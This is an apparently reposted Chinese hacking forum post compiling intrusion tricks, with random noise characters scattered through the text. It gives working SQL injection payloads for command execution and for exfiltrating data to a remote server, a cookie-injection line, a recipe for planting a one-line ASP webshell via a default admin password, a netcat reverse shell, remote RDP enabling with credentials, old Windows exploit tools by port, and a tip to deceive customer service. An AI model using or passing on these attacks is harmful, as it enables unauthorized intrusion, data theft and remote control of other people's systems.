SA点数据库分离技术相关
p) c' E; j* [5 _, q. n% @2 S8 \
' u5 l7 G+ s8 U+ B
SA点数据库分离搞法+语句:
; F8 _- X6 P1 U) x% B0 P& s! L; [% X" ]
注射点不显错,执行下面三条语句页面都返回正常。
1 V4 M! X) O/ _4 o6 d8 M9 iand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread'), q: q( ~! @8 _9 e. f* C7 |
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
d. t/ s, Y- j% y& Aand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')6 f. @5 U2 h T. }
可以列目录,判断系统为2000,web与数据库分离
* T4 N% A! v6 c2 N, m遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
. I _; e7 W' d* ~6 \在注射点上执行
- Z( V% \& k- o5 T& Kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--# N* w$ C& c" u0 j- l& X2 l
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP a5 ^' Q( F3 R, U
还有我用NC监听得其他端口都没有得到IP。" c' {+ B% k) f+ p
0 d- w1 c% U+ h- c, x
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
& N' s; L6 m6 Z4 j$ G; S'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
/ Y2 G) `7 d/ V8 w$ S0 \' v
6 t1 A% f& [1 @* p4 A. b;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--& p7 }5 f: Q" ?3 W
+ s6 F$ I K7 z+ J" J现在就猜想是不是数据库是内网而且不能连外网。! a% V6 x* [& G0 h: m' r
7 W7 M0 F; s; O
2 }* }1 R a5 y2 g5 n
access导出txt文本代码& _, ~0 K P' \( {
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
. H8 c6 R1 v+ u0 G8 ]! ]$ s) q+ i1 [$ p1 H4 \' K& S
5 ]& ?: _- v5 U7 N4 K' `$ J/ K% L* u1 |% x/ ` C# ?. {2 W: O0 F
自动跳转到指定网站代码头! F5 i7 Z1 N: h- X
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
0 j# e+ N$ C" ?% D; @/ [3 z" g h: f1 }: y! [
* d& s+ F+ @$ Y% v2 S& w# V f2 H
入侵java or jsp站点时默认配置文件路径:
) Z: Q. `8 _/ W+ k& p. k\web-inf\web.xml1 N8 o& T0 j. ]3 B0 f) T3 ^
tomcat下的配置文件位置:' ^( y" b0 @# [6 w) p7 ?$ i
\conf\server.xml (前面加上tomcat路径)
# q1 U/ J+ B9 B# L" l\Tomcat 5.0\webapps\root\web-inf\struts-config.xml; d; T# T9 M6 ?/ m
3 N. @6 i: O% e0 x* z# [7 g' F% Z; F/ N7 p5 \/ u
/ r1 D1 |9 ]" p% z8 ~! k! {5 c
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
) c5 s. {. G6 `; p) s8 g* r-1%23
4 m# H- k. R' R" F0 Y9 Q>
) \4 ]2 A- {8 o* y% X" p<9 T& G! X. R$ [6 ?8 S- T* H& }
1'+or+'1'='1
( F6 G( `5 J+ j$ \0 c; Y' aid=8%bf* ~. _. u. }5 x- ?4 l2 \
2 \- f: W# Y3 x- w; @$ f5 t! H- S全新注入点检测试法:7 Z, B9 a0 _$ p" c2 l) V
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
6 Q1 b% L) a, ~9 Q' v* c3 G: }! A) X
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。3 b/ ~( @3 ]0 V/ H
) ?6 T6 o" d- m/ W2 o3 d) R2 P" ^搜索型注入判断方法:9 J+ f5 j5 d9 E( U0 `
北京%' and '1'='1' and '%'='' V5 {" \; r) w- Z
北京%' and '1'='2' and '%'='5 v' E" {' Y8 q8 N+ v
+ W" T0 D5 w; P$ w
4 s$ V: }( A' E3 F! g
COOKIES注入:$ _' y5 ?9 S v1 T
& ~4 B& i. Y( W
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
W6 h5 v( U# N# {9 J" O1 F# h) b" ]0 _$ X- [; k" B
2000专业版查看本地登录用户命令:
9 L7 f X, g6 Hnet config workstation/ }: ]8 x {- ~; ?" v% c( ^
K4 M* _" f- j n- g, V- s
! D$ V/ F/ I3 |1 q* ?" r8 M6 k2003下查看ipsec配置和默认防火墙配置命令:8 A7 q0 f0 C4 \( c, T
netsh firewall show config
' b+ v% {5 M8 P7 Q R3 {# A$ b Cnetsh ipsec static show all
8 j, o. W; H( r* d+ z! ?& |) u3 ^( w5 O1 o5 @! V6 f
不指派指定策略命令:
7 |. u9 ?8 x* \- U4 t) T; Enetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
5 K" @0 k2 Z0 [1 ^1 bnetsh ipsec static show policy all 显示策略名 ]5 v d+ E' f0 S
. D/ B' c, \" o J* q7 X5 d/ ~9 m$ ]% Z: K) Q
猜管理员后台小技巧:
$ x4 y B: X; d# kadmin/left.asp
' e2 U, v7 J/ z1 n/ ^( |2 gadmin/main.asp j" @$ X- Y; V7 |& O/ ~
admin/top.asp
0 y0 s8 z6 R8 s1 k3 T# D" n7 madmin/admin.asp
2 d8 s. f* H* c. r( @; ~会现出菜单导航,然后迅雷下载全部链接) o) D" a- U4 ]8 v
5 u3 }( K# l7 r+ t7 Q, v3 z2 B
. j" O' a0 I# X. N( g1 n7 D社会工程学:
2 I9 T) w/ U" V5 u, z用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
0 O' W2 }8 ?+ u4 ~8 ?" H然后去骗客服7 J( k% I# |) V" K7 r0 f
$ z2 r! E4 x$ S+ v! v" _5 ]
7 }. @# w# y8 q+ |/ O2 ^统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
$ I$ P: `6 F1 S, W* w; C3 \0 Y查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
; d2 H$ J$ j ~/ X, K/ m 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
! ^6 G% w7 L% |2 S6 }. ^& R# Y
) {" J2 d! Z) I' l) I% O. I( N: m( z1 c3 N$ }0 g
" I/ E( y2 p+ [" I' b% @( {
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)4 Q4 ?: p, F. V I5 g
3 _+ H$ Q; x" J# V# r1 w+ `
( {5 e4 ]' t# n4 Y0 l p
9 ~9 C% E% p' t- u
CMD加密注册表位置
3 V1 ^. L, z% G9 B0 K7 h- l(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor/ \' F' H0 c, d/ }9 U5 U/ X1 k) L
AutoRun
2 X0 o- H {4 C9 u' ]: o4 B t& ~% s) m. Y) w$ k8 g
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
2 D, P& A# T+ W' h8 HAutoRun8 F) q1 a C! F
1 T" J. i% J& F. x
L; k/ b Y9 u. q) Y5 c+ J. F
在找注入时搜索Hidden,把他改成test
3 v1 G* O8 p+ G8 U: P6 x% o
a0 A$ ?; X. B$ D( t
; N' v- }2 x$ @! h5 K \
1 l; q. `0 _) S2 t. Gmstsc /v:IP /console * P" D/ N7 `0 O" r, w, A9 H
1 w; W4 I# I- X
) S9 \0 c! I* E) Y( d( R' o( q j一句话开3389:2 m9 i( c& C8 G$ f2 l+ z
" N: W8 D+ ~2 \+ G3 s/ P1 Z
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 3 d/ O) r u; t: I. O
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
; l6 n0 B. }, ?: X$ }1 R& [9 A/ w; ^; J6 ^7 b1 [! Y
|, g" }0 h% I3 n/ s' G知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
) t! }# @& d `* W* o) l$ y0 i& J5 CInsert into admin(user,pwd) values('test','test')/ u* d4 z6 V& o
5 `/ Z2 p+ v1 ]8 w; Z4 Z4 c
B, A" F6 f& Z4 s0 i/ Y
NC反弹3 E8 a8 m' k# }: _/ @" H7 T
先在本机执行: nc -vv -lp 监听的端口 (自己执行) 2 r% D7 O) c' |, B
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)) |6 i( f. ~* O( o
/ B$ L) a1 ~0 |3 h; d
% \: R9 o3 M/ g" E( a0 |% O# d# E
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题- L+ Q W& K1 Y/ Z5 G5 ?* r4 s$ ^* G3 Q
1 B$ y5 \5 R1 e, U3 `* m, k
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录7 l ~1 D( }' E% B7 b% [
例如:: j, c, L0 Z* p3 h
subst k: d:\www\ 用d盘www目录替代k盘
! N1 {5 q9 n5 [: msubst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对